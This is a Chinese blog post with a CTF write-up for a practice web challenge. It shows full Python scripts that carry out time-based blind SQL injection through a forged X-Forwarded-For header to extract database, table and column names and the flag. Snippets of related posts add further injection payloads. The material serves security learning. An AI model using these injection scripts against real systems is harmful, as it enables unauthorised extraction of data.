ctf web5 练习_CTF练习平台——web15

最新推荐文章于 2023-04-20 01:35:49 发布
最新推荐文章于 2023-04-20 01:35:49 发布
阅读量349 收藏
点赞数
文章标签: ctf web5 练习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34566436/article/details/112841161
版权
这篇博客介绍了如何通过时间延迟盲注来获取CTF Web15练习平台上的数据库信息。作者展示了如何爆破数据库名、表名和字段名,并最终找到flag。
摘要由CSDN通过智能技术生成

1、web15

image

这道题的题目已经将源代码给我们了

可以看出这是time-based盲注

点开链接,我们看到

image

想到可以尝试各种IP的HTTP头:

X-Forwarded-For

Client-IP

x-remote-IP

x-originating-IP

x-remote-addr

发现X-Forwarded-For可以伪造

image

发现注入的语句原封不动的显示在页面中,但如果注入的语句中有逗号,则逗号后面的内容就不会显示在页面中

image

逗号后面的内容被截掉了

然后就可以写一个脚本爆破得到库名,表名和字段名了

首先我们来找一下数据库名

# -*- coding:utf-8 -*-

import requests

import string

url = "http://120.24.86.145:8002/web15/"

guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation

database=[]

for database_number in range(0,100): #假设爆破前100个库

databasename=''

for i in range(1,100): #爆破字符串长度,假设不超过100长度

flag=0

for str in guess: #爆破该位置的字符

#print 'trying ',str

headers = {"X-forwarded-for":"'+"+" (select case when (substring((select schema_name from information_schema.SCHEMATA limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(database_number,i,str)}

try:

res=requests.get(url,headers=headers,timeout=4)

except:

databasename+=str

flag=1

print('正在扫描第%d个数据库名,the databasename now is '%(database_number+1) ,databasename)

break

if flag==0:

break

database.append(databasename)

if i==1 and flag==0:

print('扫描完成')

break

for i in range(len(database)):

print(database[i])

找到的数据库为

TIM截图20180202145718.png

这里有两个数据库,我们先尝试information_schema这个数据库

用脚本跑一下有多少列

# -*- coding:utf-8 -*-

import requests

import string

url = "http://120.24.86.145:8002/web15/"

guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation

database=[]

for table_number in range(0,500):

print('trying',table_number)

headers = {"X-forwarded-for":"'+"+" (select case when (select count(table_name) from information_schema.TABLES ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}

try:

res=requests.get(url,headers=headers,timeout=4)

except:

print(table_number)

break

TIM截图20180202154423.png

一共42列,一般猜测在最后,前面应该都是information_schema里的那些

尝试一下

# -*- coding:utf-8 -*-

import requests

import string

url = "http://120.24.86.145:8002/web15/"

guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation

tables=[]

![TIM截图20180202153421.png](http://upload-images.jianshu.io/upload_images/9168776-0183444b8a11751c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

for table_number in range(41,42): #假设从第60个开始

tablename=''

for i in range(1,100): #爆破字符串长度,假设不超过100长度

flag=0

for str in guess: #爆破该位置的字符

headers = {"X-forwarded-for":"'+"+" (select case when (substring((select table_name from information_schema.TABLES limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(table_number,i,str)}

try:

res=requests.get(url,headers=headers,timeout=4)

except:

tablename+=str

flag=1

print('正在扫描第%d个数据库名,the tablename now is '%(table_number+1) ,tablename)

break

if flag==0:

break

tables.append(tablename)

if i==1 and flag==0:

print('扫描完成')

break

for i in range(len(tables)):

print(tables[i])

TIM截图20180202153421.png

找到了flag表

接下来求列名

再跑一下有多少列

# -*- coding:utf-8 -*-

import requests

import string

url = "http://120.24.86.145:8002/web15/"

guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation

database=[]

for table_number in range(0,1000):

print('trying',table_number)

headers = {"X-forwarded-for":"'+"+" (select case when (select count(COLUMN_name) from information_schema.COLUMNS ) ='%d' then sleep(5) else 1 end) and '1'='1"%(table_number)}

try:

res=requests.get(url,headers=headers,timeout=4)

except:

print(table_number)

break

TIM截图20180202155052.png

一共483列

老思路,直接暴力最后一个

# -*- coding:utf-8 -*-

import requests

import string

url = "http://120.24.86.145:8002/web15/"

guess = string.ascii_lowercase+string.ascii_uppercase+string.digits+string.punctuation

columns=[]

for column_number in range(482,483): #假设从第60个开始

cloumnname=''

for i in range(1,100): #爆破字符串长度,假设不超过100长度

flag=0

for str in guess: #爆破该位置的字符

#print 'trying',str

headers = {"X-forwarded-for":"'+"+" (select case when (substring((select COLUMN_name from information_schema.COLUMNS limit 1 offset %d) from %d for 1)='%s') then sleep(5) else 1 end) and '1'='1"%(column_number,i,str)}

try:

res=requests.get(url,headers=headers,timeout=4)

except:

cloumnname+=str

flag=1

print('正在扫描第%d个列名,the cloumnname now is '%(column_number+1) ,cloumnname)

break

if flag==0:

break

columns.append(cloumnname)

if i==1 and flag==0:

print('扫描完成')

break

for i in range(len(columns)):

print(columns[i])

TIM截图20180202155419.png

然后直接暴力找flag就行了

import requests

import string

words = string.ascii_lowercase + string.ascii_uppercase + string.digits

url = 'http://120.24.86.145:8002/web15/'

answer=''

for length in range(1,100):

flag=0

for key in words:

data = "'+(select case when (substring((select flag from flag) from {0} for 1)='{1}') then sleep() else 1 end) and '1'='1".format(length,str(key))

headers={

"X-FORWARDED-FOR": data

}

try:

res=requests.get(url,headers=headers,timeout=5)

except Exception as e:

answer+=key

print(answer)

flag=1

break

if flag==0 and answer!= '':

break;

print(answer)

flag{cdbf14c9551d5be5612f7bb5d2867853}

0804HDNS
关注
CTF论剑场-web15
weixin_45650977的博客
11-23 147
思路: 1、查看源码,无用。 2、发现url有问题,正常是index.php而这里是1ndex.php。于是使用御剑扫描后台 3、双击下载下载index.php文件,分析index文件源码: 4、构造payload:
CTF论剑场web题目(持续更新)--WEB15
jiuyongpinyin的博客
07-21 304
web15 首先打开页面随意提交一个变量: 告诉我们不是这里,查看源码没啥有用的,接下来就是后台扫描了: 发现有一个这个后台,进去了是一个能够下载的文件,里面是源码: 根据源码尝试了一波,没做出来,好吧,其实我的代码审计功力极差,然后想到了题目提示的VIM编辑器,但是不知道这个提示有啥用,查了好多资料没查到点上。最后没忍住看了大佬的write up : 把之前抓到的包进行一下修改,就可以了,这里用到了VIM编辑器的临时文件泄露,又get了一个新姿势: 参考链接:https://blog.csdn.
青少年CTF训练平台-WEB-部分wp
SwBack的博客
04-04 2681
扫描发现备份文件 打开发现flag直接上传,然后获取flag木马地址,通过扫描目录发现。直接添加请求头user-agentt: zerodiumsystem(‘cat /flag’);连接之后,查找具有权限的命令根据提示直接发现flag 提示说明没有中文但是仍然错误,查看shadow,通过john破解密码 用户名后有$y,则表明密码已使用 yescrypt 进行哈希处理指定format参数 新手的登录 使用提示的user账号登录之后抓包修改cookie为admin。发包,得到flag访问之后直接查看js
ctf web5 练习_安全检查中...
weixin_39866867的博客
12-29 143
+((!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![]+[])+(!+[]+(!![])+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![]+!![]+!![])+(!+[]-(!![]))+(!+[]+(!![])+!![]+!![])+(+!![])+(!+[]+(!![])+!![]+!![]+!![]+!![])+(!+[]+(!...
CTF论剑场(web) write up 未完待续
qq_45106794的博客
11-09 454
CTF论剑场(web) write up web26 直接给你一串代码 <?php $num=$_GET['num']; $str=$_GET['str']; show_source(__FILE__); if (isset($num)&&isset($str)) { if (preg_match('/\d+/sD',$str)) { echo "v...
ctf web5 练习_CTF练习平台——web(3)
weixin_30440363的博客
01-15 773
1、Web4var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%70%61%73%73%77%6f%72%...
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 6580
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
南邮CTF练习题——web
热门推荐
dcison的博客
11-11 4万+
南邮CTF部分题解
BugKuCTF(CTF-练习平台)——WEB-sql注入
Ifish的博客
02-25 3613
打开网址 注入题 修改id的值 发现只在id=1时显示,说明注入点应该是id=1 ‘闭合,发现不报错,尝试宽字节注入 报错 KEY{54f3320dc261f313ba712eb3f13a1f6d}...
BugKuCTF(CTF-练习平台)——WEB-计算题
Ifish的博客
02-25 1080
打开网址 发现只可以填写一位数 修改maxlength 即得flag
BugKuCTF(CTF-练习平台)——WEB-SQL注入1
Ifish的博客
03-10 2003
%00截断 http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201,database()%23 http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201,hash%20fro%00m%20sql3.key%23 KEY{c3d3c17b4ca7...
bugku Web4
rommel的博客
08-01 3845
首先进入题面就是常见的提交框,老规矩直接查看源代码 在这里我们发现了有个js它定义了两个变量并采用eval函数算一些什么东西 var p1 = '%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2
ctfshow】命令执行->web29-web44
m0_55400802的博客
04-20 604
半夜网抑云听歌听emo了这苦不能我一个人受nnd刷会儿题不然睡不着了呜呜呜红中(hong_zh0)CSDN内容合伙人、2023年新星计划web安全方向导师、华为MindSpore截至目前最年轻的优秀开发者、IK&N战队队长、吉林师范大学网安大一的一名普通学生、搞网安论文拿了回大挑校二、阿里云专家博主、华为网络安全云享专家、腾讯云自媒体分享计划博主三刷命令执行了,怀念捏。
CTF-Web5(00截断)
→_→
08-19 1309
5.上传绕过 题目名字和提示都说的很明确,这题是一道上传绕过的题目,点开题目链接,可以看到一个文件上传的界面: 这里可以尝试随便上传一些文件,看看效果: 先尝试上传一个jpg文件: 上传jpg文件的提示为必须上传后缀名为php的文件才行,那么我们再上传一个php文件: 上传的结果是告诉我们仅支持jpg,gif,png后缀的文件。 仅支持上传jpg,gif,png后缀的文件,但是上传后又会提示必须上传后缀名为php的文件才行。 那么现在这个问题该怎么去解决呢,目前有一个思.
HTTP 请求头中的 Remote_Addr,X-Forwarded-For,X-Real-IP | Spring Cloud 13
gmHappy
03-08 1万+
X-Real-IP是一个自定义`Header`。`X-Real-Ip` 通常被 `HTTP` 代理用来表示与它产生 `TCP` 连接的设备 `IP`,这个设备可能是其他代理,也可能是真正的请求端。需要注意的是,`X-Real-Ip` 目前并不属于任何标准,代理和 `Web` 应用之间可以约定用任何自定义头来传递这个信息。 X-Forwarded-For(`XFF`)是用来**识别**通过**HTTP代理**或**负载均衡**方式连接到`Web`服务器的客户端**最原始的`IP`地址的`HTTP`请求字段。
如何正确设置nginx中remote_addr和x_forwarded_for参数
08-16 2万+
怎样正确设置remote_addr和x_forwarded_for 2013-04-20 做网站时经常会用到remote_addr和x_forwarded_for这两个头信息来获取客户端的IP,然而当有反向代理或者CDN的情况下,这两个值就不够准确了,需要调整一些配置。 什么是remote_addr remote_addr代表客户端的IP,但它的值不是由客户端提供的,而
CTF-Web7(涉及盲注脚本)
→_→
08-21 1221
7.who are you? 进入这个页面,发现他获取了我的ip,首先想到的就是user agent注入,用updatexml试一下,什么错的没有报...看来这个思路不行(注:user agent注入和updatexml不会的参考Sqli-labs之Less-18和Less-19) 百度了才知道这是一道伪造IP的题,总结下,伪造IP的HTTP头都有这些: X-Forwarded-For Client-IP x-remote-IP x-originating-IP x-re...
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-4
youngerll的博客
12-30 3419
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-4
ctf Web_php_include
最新发布
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值